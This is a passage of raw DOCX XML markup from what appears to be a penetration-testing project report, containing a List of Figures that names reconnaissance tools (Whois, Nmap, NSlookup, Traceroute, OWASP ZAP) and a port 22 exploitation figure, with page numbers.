                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04AF336C" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00A778D5" w:rsidSect="00336E0D">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="140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05479F8" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:spacing w:before="73"/>
        <w:ind w:left="1683" w:right="1608"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>List</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Figures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D800B9" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A0AD0C" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1B7828" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="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377"/>
        <w:gridCol w:w="6077"/>
        <w:gridCol w:w="1137"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A778D5" w14:paraId="4808A5E9" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="1021"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BDD655A" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="7" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="265" w:right="266"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Figure</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27863132" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="187" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="265" w:right="259"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="621A1C9C" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="7" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="2278" w:right="2272"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC87786" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="7" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="271"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Page</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B9E03E9" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="187" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A778D5" w14:paraId="4A24DE1A" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="433"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ED1B231" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DADAD69" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="2278" w:right="2286"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Block</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Diagram</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AE2640C" w14:textId="13D43656" w:rsidR="00A778D5" w:rsidRDefault="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">      10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A778D5" w14:paraId="7B739C08" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="036958B3" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B7C88EA" w14:textId="1FB6BA59" w:rsidR="00A778D5" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Who is</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="739D7A8E" w14:textId="09275374" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F264F7" w14:paraId="27626028" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75FA2134" w14:textId="69E34F27" w:rsidR="00F264F7" w:rsidRDefault="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17D8CD31" w14:textId="377C4DA8" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="734489AB" w14:textId="617FABC8" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F264F7" w14:paraId="378C0068" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="040F9BE7" w14:textId="79EE093F" w:rsidR="00F264F7" w:rsidRDefault="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65DC9753" w14:textId="00FA81FC" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>NSlookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AA64403" w14:textId="6E4FA37B" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F264F7" w14:paraId="045AEF6C" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10F85D0B" w14:textId="003F978B" w:rsidR="00F264F7" w:rsidRDefault="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23161882" w14:textId="38DAED7C" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Whois(target website)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21B6FED5" w14:textId="37D380C0" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F264F7" w14:paraId="1A29A667" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7813E184" w14:textId="59EE3814" w:rsidR="00F264F7" w:rsidRDefault="00336E0D">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DBF818F" w14:textId="04738228" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
            <w:r w:rsidR="00B65A18">
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>(target website)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26DA277D" w14:textId="1F802BA5" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F264F7" w14:paraId="0201C4A6" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AE1758A" w14:textId="22EA2D83" w:rsidR="00F264F7" w:rsidRDefault="00336E0D">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46670AD8" w14:textId="471895F3" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Nslookup</w:t>
            </w:r>
            <w:r w:rsidR="00B65A18">
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>(target website)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A17E6E4" w14:textId="78523EE0" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F264F7" w14:paraId="679C1520" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18E1C5AF" w14:textId="0CE0B0B1" w:rsidR="00F264F7" w:rsidRDefault="00336E0D">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="286998F4" w14:textId="42907EF0" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Traceroute (Target Website)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="761D92F7" w14:textId="129F399E" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F264F7" w14:paraId="095CF473" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61F479D5" w14:textId="22E72F53" w:rsidR="00F264F7" w:rsidRDefault="00336E0D">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AF2D078" w14:textId="44D625ED" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Owasp ZAP Scan Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5034819B" w14:textId="68557242" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F264F7" w14:paraId="15A07CF6" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E1A8AC9" w14:textId="55FFE107" w:rsidR="00F264F7" w:rsidRDefault="00336E0D">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B4B24E6" w14:textId="3FD45BE8" w:rsidR="00F264F7" w:rsidRDefault="00B65A18" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Flowchart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD36A44" w14:textId="547D69CC" w:rsidR="00F264F7" w:rsidRDefault="00B65A18" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F264F7" w14:paraId="5D23FC6D" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48E69D11" w14:textId="4FBABC78" w:rsidR="00F264F7" w:rsidRDefault="00336E0D">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52247BC0" w14:textId="3069D032" w:rsidR="00F264F7" w:rsidRDefault="00B65A18" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Port 22 Vulnerability Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CAC6823" w14:textId="44794A53" w:rsidR="00F264F7" w:rsidRDefault="00B65A18" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
